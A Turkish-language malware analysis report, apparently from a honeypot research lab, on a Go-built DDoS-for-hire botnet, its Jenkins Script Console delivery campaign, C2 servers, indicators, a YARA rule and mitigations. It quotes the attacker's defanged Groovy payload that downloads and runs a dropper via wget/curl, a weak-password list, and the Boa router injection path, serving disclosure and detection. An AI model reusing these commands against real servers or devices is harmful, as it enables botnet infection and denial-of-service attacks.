Bu sayfa bir çeviridir. Esas alınan metin İngilizce sürümdür. İngilizcesini okuyun
malware · botnet · ddos · golang · iot · jenkins · honeypot · mirai
Çok Platformlu, Kiralık Bir Go DDoS Botnet'i
Kinryū Labs, 11 ikili dosyadan ve 13 mimariden oluşan bir dropper paketi hâlinde dağıtılan ve günlerce süren bir Jenkins Script Console istismar kampanyasıyla teslim edilen, Go ile derlenmiş bir DDoS botnet'inin Windows derlemesi olan bot.exe'yi analiz etti. Hazırlama sunucusuna yönelik keşif çalışması, çalışır durumda ve kimlik doğrulamalı bir kiralık DDoS API'si, bir Go SSH komut kanalı ve aynı sunucuda barındırılan Mirai soyundan bir aile tespit etti. Bunun ticari bir kiralık DDoS operasyonu olduğunu yüksek güvenle değerlendiriyoruz.
Yazan Davis Zheng·
TLP:CLEAR. Kamuya açık yayım için onaylanmıştır. Kinryū Labs bal küpü sensör ağı tarafından yakalanmıştır. Aşağıdaki göstergeler etkisizleştirilmiştir.
Yönetici özeti
- 13mimari derlemesi, 11 benzersiz ikili dosya
- 5adlandırılmış DDoS yöntemi, ayrıca kiralık bir API
- 3tek bir /22 içinde eşgüdümlü kaynak IP
- 2tek sunucuda botnet ailesi
bot.exe, çok mimarili bir dropper paketi olarak dağıtılan ve Go ile derlenmiş bir DDoS botnet’inin Windows x86-64 derlemesidir. Pakete eşlik eden bins.sh adlı kabuk betiği, Windows ikili dosyasının yanı sıra 32 ve 64 bit x86’yı, dört ARM profilini, ARM64’ü, Android ARM64’ü ve big-endian ile little-endian MIPS’i kapsayan on üç mimari derlemesini indirir; yinelenenler ayıklandığında bunların on biri benzersizdir. Paket, bal küpü ağına dışarıya açık bir Jenkins sunucusunun istismar edilmesi yoluyla ulaşmıştır.
Zararlı yazılım, adlandırılmış beş flood yöntemini (HTTP, TLS el sıkışması, ICMP, doğrudan TLS ve VOULT olarak etiketlenen hacimsel bir yöntem), meşru trafiğe benzemek amacıyla tarayıcı User-Agent dizgilerini ve yerel ayar başlıklarını döndüren bir HTTP flood’unu ve kendi kendine yayılmak için RealTek SDK cihazlarındaki Boa web sunucusunu hedefleyen komut enjeksiyonu yüklerini barındırmaktadır. 185.226.93[.]242 adresindeki hazırlama sunucusuna yönelik keşif çalışması, 3333 numaralı portta kimlik doğrulamalı bir kiralık DDoS API’si, komut kanalı işlevi gören ve 2222 numaralı portta Go ile gerçeklenmiş bir SSH hizmeti ve Mirai/Gafgyt soyundan ikinci bir botnet ailesini barındıran anonim bir FTP hizmeti tespit etmiştir.
Kinryū Labs, bot.exe’nin ticari bir kiralık hizmet olarak işletilen, kötü niyetli, kendi kendine yayılan, çok mimarili bir DDoS botnet’inin parçası olduğunu yüksek güvenle değerlendirmektedir. Değerlendirmeyi üç bulgu taşımaktadır: ikili dosyanın kendi saldırı yöntemi ve istismar dizgileri; operatörün hazırlama sunucusunda iş parametrelerini doğrulayan ve kimlik doğrulaması isteyen, çalışır durumdaki kiralık API; ve paketi teslim eden eşgüdümlü kaynak adreslerden yürütülen sürekli bir kampanyaya ait bal küpü telemetrisi.
- bot.exe, çok platformlu bir Go DDoS botnet'idir. Beş ayrı flood yöntemine ait günlük dizgisi hedef ve süre parametreleri taşımakta, bunların yanında tarayıcı taklidi düzeneği ve SOCKS5 desteği bulunmaktadır. Tümü gizlenmemiş dizgiler hâlindedir ve çalışır durumdaki API tarafından doğrulanmaktadır.
- Operasyon, ticari bir kiralık DDoS hizmeti olarak yürütülmektedir. Hazırlama sunucusu, 3333 numaralı portta iş parametrelerini (
user,psw,host,method,time,port) doğrulayan ve geçersiz kimlik bilgilerini reddeden bir API sunmaktadır. - Botnet, IoT komut enjeksiyonu yoluyla kendi kendine yayılmaktadır. İkili dosya, bir Boa
formSysCmdkomut enjeksiyonu yükü, yönlendirici oturum açma kaba kuvvet yolu ve dışa aktarılmışloginDeviceileloginDeviceCaptchaişlevlerini taşımakta; bal küpü günlüklerine kaydedilen dropper tek satırlık komutunun aynısını enjekte etmektedir. - Üç kaynak IP tek bir operatöre aittir.
185.226.92[.]0/22içindeki üç adres, eşgüdümlü zamanlama ve ortak bir kimlik bilgisi listesiyle birebir aynı yükleri teslim etmiştir; ayrıca teslim ve hazırlama IP'leri birebir aynı SSH sunucu anahtarlarını sunmaktadır. Bu durum tek bir sunucuya ya da klonlanmış imajlara işaret etmektedir.
Teslim: sürekli bir Jenkins Script Console kampanyası
Paket, internete açık bir Jenkins örneğinin istismar edilmesiyle teslim edilmiştir. Bal küpü telemetrisi tutarlı, iki adımlı bir yöntem kaydetmiştir: CSRF belirtecini almak için bir GET /crumbIssuer/api/json, ardından Groovy Script Console yükü taşıyan bir POST /script. Yük bütün denemelerde birebir aynıydı ve burada etkisizleştirilmiş hâlde verilmektedir:
println new ProcessBuilder('sh','-c',
'cd /tmp; wget hxxp://185.226.93[.]242:1001/bins.sh;
curl -O hxxp://185.226.93[.]242:1001/bins.sh;
chmod 777 *; ./bins.sh'
).redirectErrorStream(true).start().text
İstekler, admin hesabı için zayıf sayısal parolalardan oluşan kısa bir sözlüğü sırayla deneyen bir Authorization: Basic başlığı taşımıştır (admin:1123, admin:123451, admin:1231231, admin:1111111, admin:12345123). Bu, hedefe yönelik bir kimlik doğrulamadan çok otomatik bir kimlik bilgisi listesinin imzasıdır.
Kampanya, birkaç gün boyunca yinelenen dalgalar hâlinde yürütülmüştür:
- Dalga 1İlk yoklamalar: hazırlama IP'sinden ve aynı blok içindeki ikinci bir adresten gelen CSRF crumb denetimi ve ardından Groovy RCE.
- Yakalama
bins.shve on üç varyantın tamamı, yaklaşık on dört saat arayla iki kez yakalandı; her seferinde bayt düzeyinde aynıydı. - Sonraki dalgalarÜç kaynak IP'nin tamamından, birbirinden dakikalar arayla ve döndürülen User-Agent dizgileriyle yürütülen paralel istismar.
İstismar istekleri geniş bir gerçekçi tarayıcı User-Agent kümesini döndürürken, yeni Jenkins hedefleri arayan keşif taraması (bir /login isteğinin ardından gelen hızlı /script isteği salvosu) varsayılan Go-http-client/1.1 değerini kullanmıştır. Sahte User-Agent dizgileri istismar yükleriyle birlikte gelmekte, tarayıcı ise botnet’in kendi Go istemcisini kullanmaktadır. Hazırlama ve C2 sunucusunun kendisi de istismara katılmıştır; dolayısıyla saldırı ve barındırma altyapısı birbirinden ayrılmamıştır.
Zararlı yazılım: tek bir Go kod tabanı, on bir ikili dosya
Botun Go ile yazılması, tek bir kod tabanının operatörün istediği her hedefe çapraz derlenmesine olanak tanımaktadır. Dropper, ürün hattının tamamını dolaşır; her derlemeyi wget ile, yedek olarak bir kez de curl ile indirir, çalıştırılabilir olarak işaretler, çalıştırır ve siler. Pakette, Linux dropper’ının yine de chmod +x uyguladığı bir Windows .exe dosyası bulunmaktadır ve betiğin üretilmiş yapısı, derle-ve-listele biçiminde bir üretim hattına işaret etmektedir. Yinelenenler ayıklandığında on üç derleme on bir benzersiz ikili dosyaya inmektedir: x86 ile i386 derlemeleri birbiriyle aynıdır; genel ARM ile ARMv7 derlemeleri için de aynı durum geçerlidir. MIPS ve eski ARM’den Android’e uzanan mimari yelpazesi, yönlendiricileri, kameraları ve diğer gömülü cihazları hedefleyen bir botnet’e işaret etmektedir; Windows derlemesi ise aynı kodu masaüstlerine ve sunuculara taşımaktadır.
İkili dosya paketlenmiş değildir (PE bölüm entropileri 5.4 ile 6.3 arasındadır) ve sembolleri ayıklanmamıştır (Go derleme kimliği ve çalışma zamanı sembolleri bozulmadan durmaktadır); bu nedenle yetenekleri düz dizgiler hâlinde görülebilmektedir. Derleme zaman damgası sıfırlanmıştır ki bu, Go derlemeleri için olağandır.
İkili dosyanın günlük dizgilerinde beş flood yöntemi adlandırılmıştır ve her biri bir hedef ve bir süreyle biçimlendirilmektedir: bir “HTTP (Optimized)” flood’u, bir TLS/TCP “Handshake” tüketme flood’u, bir ICMP “PING” flood’u, doğrudan bir “TLS+” oturum flood’u ve hacimsel, büyük olasılıkla UDP tabanlı bir “VOULT” yöntemi. Hem uygulama katmanı hem de ağ katmanı seçenekleri mevcuttur.
HTTP flood’u, meşru trafik gibi görünmek üzere tasarlanmıştır. Windows, macOS, iPad ve Android üzerinde Chrome, Edge, Opera, Firefox ve Safari’ye ait ondan fazla tarayıcı User-Agent dizgisini, on beş Accept-Language yerel ayarını ve saldırı azaltma hizmetlerinin incelediği sec-fetch-* ile sec-ch-ua-* parmak izi başlıklarını döndürmektedir. Referer başlığını, itibarı yüksek küçük bir site kümesinden seçmektedir (google.com, reddit.com, facebook.com, bing.com, twitter.com ve fbi.gov). User-Agent kümesindeki girdilerden biri, birebir Hello World dizgisidir; bu geliştirici yer tutucusu, hiçbir meşru istemci tarafından gönderilmediği için temiz bir tespit imzası sunmaktadır.
Yayılma, birçok RealTek SDK yönlendiricisi ve kamerasında hâlâ sevk edilen küçük bir gömülü HTTP arka plan süreci olan Boa web sunucusunu hedeflemektedir. İkili dosya, Boa’nın formSysCmd işleyicisine yönelik bir komut enjeksiyonu yükü ile yönlendirici yönetim arayüzlerine yönelik bir oturum açma kaba kuvvet yolunu, JSON kimlik bilgisi alanları ve dışa aktarılmış loginDevice ile loginDeviceCaptcha işlevleriyle birlikte taşımaktadır. Enjekte edilen komut, dropper’ın tek satırlık komutudur; dolayısıyla ele geçirilen bir cihaz, bir sonrakinin teslim noktası hâline gelmektedir.
İkili dosyaya dâhil edilen Go modüllerinin tümü standart golang.org/x paketleridir; bağlanmış üçüncü taraf bir C2 çatısı yoktur. Bunlar arasında chacha20poly1305, http2/hpack, dns/dnsmessage ve http/httpproxy bulunmakta olup gözlemlenebilir yeteneklerle örtüşmektedir: kimlik doğrulamalı şifreli kanal, HTTP/2, ham DNS ve SOCKS5 vekilliği (socks5, socks connect ve socksUsernamePassword dizgileri mevcuttur). C2 yapılandırması çalışma zamanında hxxp://<C2>/config.dat adresinden alınmaktadır; ikili dosyada sabit kodlanmış tek adres, hazırlama sunucusudur.
Komuta-kontrol ve hazırlama altyapısı
Hazırlama sunucusuna yönelik keşif çalışması aşağıdaki hizmetleri tespit etmiştir:
| Port | Hizmet | Amaç |
|---|---|---|
| 21/tcp | vsftpd 3.0.3, anonim oturum açma etkin | Zararlı yazılım hazırlama (aşağıdaki ikinci aile) |
| 22/tcp | OpenSSH 9.2p1 (Debian) | Operatör erişimi |
| 1001/tcp | Go net/http sunucusu | Birincil hazırlama: bins.sh ve varyantlarını sunar |
| 2222/tcp | Go SSH (SSH-2.0-Go) | Bot komut kanalı |
| 3333/tcp | Go net/http sunucusu | Kiralık DDoS API’si |
Kiralık hizmet değerlendirmesini iki bulgu desteklemektedir. Teslim IP’si ile hazırlama sunucusu birebir aynı ED25519, RSA ve ECDSA SSH sunucu anahtarlarını sunmaktadır; bu da onları aynı makineye ya da tek bir şablondan klonlanmış imajlara yerleştirmektedir. 2222 numaralı porttaki Go SSH hizmeti ise 22 numaralı porttaki sistem OpenSSH’inden farklı bir anahtar sunmakta, bu da onu bir yönlendirmeden çok ayrı bir uygulama olarak işaretlemektedir. 3333 numaralı porttaki API, eksik parametreler (user, psw, host, method, time/duration, port) nedeniyle isteği reddetmekte ve test kimlik bilgileri için kimlik doğrulama hatası döndürmektedir; diğer tüm yollar 404 döndürmektedir. Bu, canlı altyapı üzerinde çalışan ticari bir booter’ın, istek başına kimlik doğrulaması yapan asgari arayüzüdür.
Aynı sunucuda ikinci bir aile
Anonim FTP hizmeti, burada dosya adlarından hareketle “boatnet” olarak anılan ayrı bir botnet ailesini barındırmaktadır. Dropper’ı (ohshit1.sh) BusyBox ftpget istemcisini kullanmakta, her ikili dosyayı çalıştırmadan önce WTF olarak yeniden adlandırmakta ve Mirai/Gafgyt soyuna ait sıra dışı gömülü hedefler (ARC, m68k, SH4, SPARC) dâhil olmak üzere on beş mimaride derlemeleri arka planda başlatmaktadır. İkili dosyalar C ile derlenmiş ELF biçimindedir, sembolleri ayıklanmış ve paketlenmiştir (entropi 7.6 ile 7.9 arasındadır ve UPX sihirli baytı yoktur; bu da özel bir paketleyiciye işaret etmektedir); dolayısıyla statik incelemeden geriye pek bir şey kalmamaktadır. boatnet artefaktları bot.exe paketinden daha eskidir ve ilgisiz bir kod tabanı çalıştırmaktadır; dolayısıyla tek bir sunucu iki farklı botnet ailesini barındırmaktadır.
Barındırma
Saldırgan IP’lerinin her ikisi de 185.226.92[.]0/22 içindedir; bu blok, RIPE NCC üzerinden Türkiye merkezli bir VPS sağlayıcısına (ağ adı BIGCORE-US, AS205196 / AS57152) tahsis edilmiş olup kötüye kullanım iletişim adresi abuse@bigcore.net’tir. Barındırma sağlayıcısını bildirim amacıyla belirtiyoruz ve operatörün kimliği hakkında herhangi bir iddiada bulunmuyoruz.
İhlal göstergeleri
Saldırgan altyapısı etkisizleştirilmiştir. Örnek özetleri ve tespit dizgileri, bilinçli olarak gerçek değerlerini taşımaktadır.
Ağ
| Gösterge | Bağlam |
|---|---|
185.226.93[.]242 | Hazırlama + C2 sunucusu; aynı zamanda etkin bir tarayıcı |
185.226.92[.]110 | Birincil tarayıcı / teslim düğümü |
185.226.92[.]173 | İkincil tarayıcı |
185.226.92[.]0/22 | Barındırma tahsisi (BIGCORE, AS205196). Çevrede makul bir engelleme |
185.226.93[.]242:1001 | HTTP hazırlama (bins.sh + varyantlar) |
185.226.93[.]242:2222 | Go SSH komut kanalı |
185.226.93[.]242:3333 | Kiralık DDoS API’si (/api, parametre denetimli) |
185.226.93[.]242:21 | Anonim FTP, boatnet hazırlama alanı |
hxxp://<C2>/config.dat | Çalışma zamanı C2 yapılandırma alma deseni |
/boafrm/formSysCmd, /boafrm/formLogin | Dışa doğru yayılmada Boa RCE ve oturum açma kaba kuvvet URI’leri |
SSH sunucu anahtarı (ED25519) …INAjVN5fIlxTHxT4R3yqTS8… | Teslim ve C2 IP’leri arasında ortak; pivot göstergesi |
Dosyalar
| Dosya | SHA-256 |
|---|---|
bot.exe (Windows x64) | 4de4621f66780e1400bf3c55f146f84f6d77bbdd3a401451f3b7f16d674e3804 |
bins.sh (dropper) | 15f92c41e5f8ee6b2f6b7cfd14d2fc61bd4163a45d79c20a4d7974cb0fe68cf6 |
boatnet.0eem0a9ali (i386) | 6fbd581a3a6f1152de4090f0d5387258a905c76fb58f0d58191eae5f3d30421b |
boatnet.0t25ax67hl (x86-64) | 920b114325d372c387616ff971947b42087dc018bb4812cdf2adae6005c1382d |
- bot.exe MD5 / SHA-1 / imphash:
88efcb919000efb700a814fc23e31e3f/6817eae057adf831892995f514fca36c489fdd10/211e227000a1da3333aab2bad5282318 - Go Build ID:
euzQMg9dNAAGDYR0FLBy/NBlt-oXDyZN8MvU4a30l/8dJq21Cvc4y0nwb3h6ja/kYq23qQRIeCoh9BwgyGK
Dropper paketinin tüm özetleri (13 derleme içinde 11 benzersiz)
| Derleme | SHA-256 | Boyut (bayt) |
|---|---|---|
amd64 | 3261921456e347fb40c2d0a605db61ee058020872486c844653696d03ebb7b70 | 5,919,119 |
x86 / i386 | 575eba4fffff7419985e4eef8e010c6c0a7dae00b23db45de895547faf2cc398 | 5,787,832 |
arm / armv7l | 9e6da804ae9ca0a07348e92d99416bcf3fc650ccbdf4a9b4db34f6d546ddfb10 | 5,898,424 |
arm5 | 365e22a1c1a77e5d88727ab6f8050548aa2170d3c2b4c8adcdfc1eb89eaea582 | 5,898,424 |
arm6 | 34186fba4b5a9c640517020d43a1ba70bdf59f1163867917950e2f7459a0839f | 5,898,424 |
arm64 | ada33a0316d364d1d3be6d23ca2e590c16db7d845795619935e42e53f9293f6b | 5,579,151 |
android_arm64 | 7d7210719451068df7906798f37ec8fd86a0dfc3df10bfa939e3d436c72346cf | 6,169,144 |
mips | 9200aac4a356190252dc6131f6b60d59367c522537258838c017266d0e3b48f5 | 6,619,351 |
mipsle | 14d62a04e97f20f2d087dcf41fb44e5597cd3d6fbe4a597229d6b3c79c8ecde7 | 6,619,351 |
bot.exe | 4de4621f66780e1400bf3c55f146f84f6d77bbdd3a401451f3b7f16d674e3804 | 6,020,608 |
Sunucu ve kimlik bilgisi artefaktları
- Jenkins
adminkaba kuvvet sözlüğü:1123,123451,1231231,1111111,12345123. ohshit1.sh(boatnet dropper’ı) ve çalıştırılmadan önceWTFolarak yeniden adlandırılan bir ikili dosya.- Ayırt edici User-Agent değerleri:
Hello World(bot HTTP flood’u) veGo-http-client/1.1(botun kendi taraması).
Davranışsal
- Jenkins üzerinde
GET /crumbIssuer/api/jsonisteğinin ardından,bins.shdosyasını indiren bir GroovyProcessBuilder('sh','-c', …)yükü taşıyanPOST /script. - Bir sunucudaki
/config.datyoluna yapılan ve öncesindeConnecting to CNC...günlük satırı bulunan giden istekler. sysCmdselect=5parametresini vewget … bins.shgövdesini içeren gelenPOST /boafrm/formSysCmdistekleri.
Tespit
Dizgiler kararlı ve gizlenmemiş olduğundan imza yazımı doğrudandır. Aşağıdaki YARA kuralı, doğrulanmış dizgilerden oluşturulmuş bir aday kuraldır; dağıtımdan önce doğrulayın.
rule go_ddos_bot_multiarch_candidate
{
meta:
description = "Candidate: Go-compiled multi-arch DDoS botnet (bot.exe family)"
author = "Kinryu Labs honeypot CTI"
reference = "4de4621f...e3804" // full SHA-256 in the IOC table
tlp = "CLEAR"
strings:
$cnc = "Connecting to CNC..." ascii
$cfg = "/config.dat" ascii
$atk1 = "HTTP (Optimized) Attack started" ascii
$atk2 = "VOULT attack" ascii
$atk3 = "Handshake Attack started" ascii
$boa = "/boafrm/formSysCmd" ascii
$iot = "loginDeviceCaptcha" ascii
$drop = "bins.sh" ascii
condition:
($cnc and $cfg) or ($boa and $drop) or (2 of ($atk1, $atk2, $atk3) and $iot)
}
Ağ tespiti:
- Jenkins: ham bir IP adresine
wget/curlçağrısı yapanProcessBuilderiçerenPOST /scriptgövdeleri için, özellikle de öncesindeGET /crumbIssuer/api/jsonvarsa uyarı üretin. - IoT yayılımı:
content:"/boafrm/formSysCmd"; content:"sysCmdselect=5";. - Altyapı: teslim ve C2 adreslerini kapsayan
185.226.92[.]0/22bloğunu engelleyin ve bu aralıktaki 1001, 2222 ve 3333 numaralı portlara giden bağlantılar için uyarı üretin.
Giderme önlemleri
- Jenkins’i internete açmayın. Kimlik doğrulama ve ağ yalıtımının arkasına yerleştirin, yönetici olmayan kullanıcılar için Script Console’u devre dışı bırakın ve erişilebilir bir derleme sunucusunu sunucunun tümüyle ele geçirilmesi riski olarak değerlendirin. Teslim vektörü buydu.
- Jenkins için güçlü kimlik bilgilerini zorunlu kılın ve kimlik doğrulamayı hız sınırlamasına tabi tutun. Kampanya,
adminhesabına yönelik zayıf sayısal parolalardan oluşan kısa bir sözlüğe dayanmaktaydı. - RealTek/Boa tabanlı yönlendiricileri ve IoT cihazlarını ayrı ağ bölümlerine alın ya da değiştirin; yönetim arayüzlerine dış erişimi engelleyin. Botnet’in yayılma hedefi bunlardır.
- Barındırma tahsisini (
185.226.92[.]0/22) ağ çevresinde engelleyin ve Boa RCE URI’si ileconfig.datalma deseni için uyarı üretin. - Giden trafiği filtreleyin. Mimari adlarını taşıyan dosyaları indirmek için 1001 numaralı porttan ham bir IP adresine ulaşan ya da bu aralıktaki 2222 veya 3333 numaralı portlara bağlanan bir sunucu anormaldir ve sunucu üzerinde tespit bulunmayan yerlerde bu yolla yakalanabilir.
- Altyapıyı bildirin. Kiralık DDoS API’si ve FTP üzerinden barındırılan zararlı yazılım, barındırma sağlayıcısının kötüye kullanım iletişim adresine (
abuse@bigcore.net) bildirilebilir.
MITRE ATT&CK eşlemesi
| Taktik | Teknik |
|---|---|
| İlk Erişim | T1190 Exploit Public-Facing Application (Jenkins Script Console; yayılma için Boa formSysCmd) |
| Kimlik Bilgisi Erişimi | T1110.001 Brute Force: Password Guessing (Jenkins admin); T1110.004 Credential Stuffing (IoT oturum açma) |
| Yürütme | T1059 Command and Scripting Interpreter (Script Console üzerinden Groovy; Unix kabuk dropper’ı) |
| Keşif | T1046 Network Service Scanning (Jenkins/IoT kendi kendine tarama); T1082 System Information Discovery; T1057 Process Discovery |
| Savunma Atlatma | T1036 Masquerading (tarayıcı User-Agent döndürme; boatnet WTF yeniden adlandırması) |
| Komuta ve Kontrol | T1071.001 Web Protocols (config.dat); T1573 Encrypted Channel (ChaCha20-Poly1305; 2222 numaralı portta Go SSH); T1571 Non-Standard Port (1001/2222/3333); T1090.001 Internal Proxy: SOCKS |
| Yanal Hareket / Teslim | T1105 Ingress Tool Transfer (çok mimarili hazırlama) |
| Etki | T1498.001 Direct Network Flood (PING, VOULT); T1498.002 Reflection Amplification (el sıkışma tüketmesi) |
Yöntem ve notlar
- Kapsam: çalıştırılmayan, yakalanmış ikili dosyaların statik analizi ve hazırlama sunucusuna yönelik etkin dış keşif (hizmet ve başlık numaralandırması, anonim FTP listelemesi ve 3333 numaralı porttaki API’nin kimlik doğrulamasız yoklanması). Hiçbir kimlik doğrulama mekanizması atlatılmamıştır.
- YARA kuralı, doğrulanmış dizgilerden oluşturulmuş bir aday kuraldır; dağıtımdan önce doğrulayın. boatnet ikili dosyaları paketlenmiştir ve az sayıda dizgi vermiştir.
- Örnekler (bot.exe paketi, dropper ve boatnet artefaktları), talep üzerine diğer araştırmacılara ve savunma ekiplerine sunulmaktadır. Kim olduğunuza ve bunlara hangi amaçla ihtiyaç duyduğunuza dair kısa bir notla contact@kinryu.sh adresine e-posta gönderin.